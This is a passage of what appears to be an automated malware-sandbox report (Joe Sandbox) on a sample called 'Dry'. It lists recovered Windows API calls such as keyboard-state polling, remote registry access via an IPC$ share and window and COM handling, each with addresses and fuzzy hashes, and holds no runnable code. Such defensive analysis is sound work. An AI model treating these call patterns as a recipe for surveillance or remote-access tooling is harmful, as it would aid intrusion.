                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00B466D0
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B466E2
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B46736
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B46744
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B46756
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B46798
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B467AB
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B467C1
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00B467CE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 47ba609e6df3dc39bc7c12910fea6652f7ee99f21d55686fdd86cbf28d626a68
                                                                                                                                                                                                                                                                                    • Instruction ID: 657749f6f2e14d3c445d9b9e7ee49e294fd04f8660fed4eb1e0e83eebc56c943
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ba609e6df3dc39bc7c12910fea6652f7ee99f21d55686fdd86cbf28d626a68
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3511FB1A00205AFDF18CF68DD85AAEBBB5FF49314F108169F919E7290DB70AE44CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE1488,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE1865
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AE1521
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE15BB
                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00B229B4
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00B229E2
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00B229F9
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000), ref: 00B22A15
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B22A27
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4be6329ef03d3c0989fcc71143ab854948830d2d1167bd46fefd7ff335866eab
                                                                                                                                                                                                                                                                                    • Instruction ID: 9c94dbb37471cf2f7c75741c5676f89c2e9629ba27d41dc4f90ed6b6ad0e5399
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4be6329ef03d3c0989fcc71143ab854948830d2d1167bd46fefd7ff335866eab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12616A31501761EFDB399F15D948B2A77F1FF81312F109269E09B97AA0CB70A891CF90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE2234: GetWindowLongW.USER32(?,000000EB), ref: 00AE2242
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AE2152
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 982bad99b21c15f54a7be6eff869575a6b1ce487ce179859591e65fad4b36530
                                                                                                                                                                                                                                                                                    • Instruction ID: 090989f1f7f54e3b9b09c9c09beda62e979c9844da3deccf555c8b794028cef3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 982bad99b21c15f54a7be6eff869575a6b1ce487ce179859591e65fad4b36530
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D041B131100690AFDB205F399C48BB937B9EF46770F544355FAAA9B2E1CB319E82DB11
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00B30D31,00000001,0000138C,00000001,00000000,00000001,?,00B5EEAE,00BB2430), ref: 00B4A091
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B30D31,00000001), ref: 00B4A09A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B30D31,00000001,0000138C,00000001,00000000,00000001,?,00B5EEAE,00BB2430,?), ref: 00B4A0BC
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B30D31,00000001), ref: 00B4A0BF
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B4A1E0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                    • Opcode ID: c0d6b882c892744b5f2145cb7f87141ae8e92c4f1ce8ecd8bfe90412f873f1f8
                                                                                                                                                                                                                                                                                    • Instruction ID: 2e5163ff028a5f0c2995ef892f7e224d35519c079bc8d2ae69a6881cda2ea76c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0d6b882c892744b5f2145cb7f87141ae8e92c4f1ce8ecd8bfe90412f873f1f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D419072844149AACB01EBE1DE86DEFB7B8AF18340F1004A5B505B20A2EF756F49DB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B41093
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B410AF
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B410CB
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B410F5
                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B4111D
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B41128
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B4112D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                    • Opcode ID: 76344c96ae1f14d8e9d1d9ee46cf1d86a97b154420bbab452265339e902bdf8e
                                                                                                                                                                                                                                                                                    • Instruction ID: 74ae590ae095d9111f6707873a6272f5cc4995e65e8eeff549b0c29621766fd9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76344c96ae1f14d8e9d1d9ee46cf1d86a97b154420bbab452265339e902bdf8e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6410672C10269ABCF11EBA4DD95DEEB7B8FF18750F044569E905B31A0EB319E44CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B74AD9
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00B74AE0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B74AF3
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B74AFB
                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B74B06
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00B74B10
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00B74B1A
                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00B74B30
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00B74B3C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                    • Opcode ID: c22eaeb68bf02ad10cc2b86e79b83f30118c9c4a0c82305ad8180a53fa741197
                                                                                                                                                                                                                                                                                    • Instruction ID: 56aefd7412b46436687b4682891495b0069c92d3111bb3cc8a1da58139399112
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c22eaeb68bf02ad10cc2b86e79b83f30118c9c4a0c82305ad8180a53fa741197
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7315A32140215ABDF129FA4DC08FDA3BB9FF0D365F114251FA29A61A0CB75DC60DBA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B646B9
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B646E7
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B646F1
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6478A
                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00B6480E
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B64932
                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B6496B
                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00B80B64,?), ref: 00B6498A
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00B6499D
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B64A21
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B64A35
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ebd55aef94f3e81000eead2445fb60282c20773a1947127cafe195de1da33d8
                                                                                                                                                                                                                                                                                    • Instruction ID: 6cdadc4a4695523821548fb4b31e1e8068472a36b01d51e5482e5593cbdaf433
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ebd55aef94f3e81000eead2445fb60282c20773a1947127cafe195de1da33d8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDC15671608701AFC700DF68C88492BBBE9FF89748F10499DF98A9B260DB34ED45CB52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B58538
                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B585D4
                                                                                                                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00B585E8
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00B80CD4,00000000,00000001,00BA7E8C,?), ref: 00B58634
                                                                                                                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B586B9
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00B58711
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00B5879C
                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B587BF
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B587C6
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B5881B
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B58821
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d86401256621572b27be03157ba912fce60b48c80704f7d44e77cb8df0e80ee
                                                                                                                                                                                                                                                                                    • Instruction ID: 977b2fa0a20396c77dfd2c4b6e1aace2aefd7b64bd827945b9449933b2916a9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d86401256621572b27be03157ba912fce60b48c80704f7d44e77cb8df0e80ee
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C10C75A00105AFCB14DFA5C888DAEBBF5FF48345B1485D8E81AAB361DB30ED45CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B4039F
                                                                                                                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00B403F8
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B4040A
                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B4042A
                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00B4047D
                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B40491
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B404A6
                                                                                                                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00B404B3
                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B404BC
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B404CE
                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B404D9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ded3639662cc6c94a02eebfd80db74e87ceffd14f1ad0c6f9aabf4d31ad43abb
                                                                                                                                                                                                                                                                                    • Instruction ID: 65bab9d43739812634fddeb0e0678dd12751acea3e4f333fc1dbb3b8d2ce71d2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ded3639662cc6c94a02eebfd80db74e87ceffd14f1ad0c6f9aabf4d31ad43abb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6417435A00219DFCF10EFA4D8489AE7BB9FF48354F008465FA19A7361CB34AA45DFA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4A65D
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B4A6DE
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B4A6F9
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B4A713
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B4A728
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B4A740
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00B4A752
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B4A76A
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00B4A77C
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B4A794
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B4A7A6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c251dc2af1707c20b1a8b5793f057a69d0c0593f4f8e4b56d44d80c325c03286
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e3daf77185ab7e34c2874beac0e965cfee62f1f303b995594c7613a03884c62
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c251dc2af1707c20b1a8b5793f057a69d0c0593f4f8e4b56d44d80c325c03286
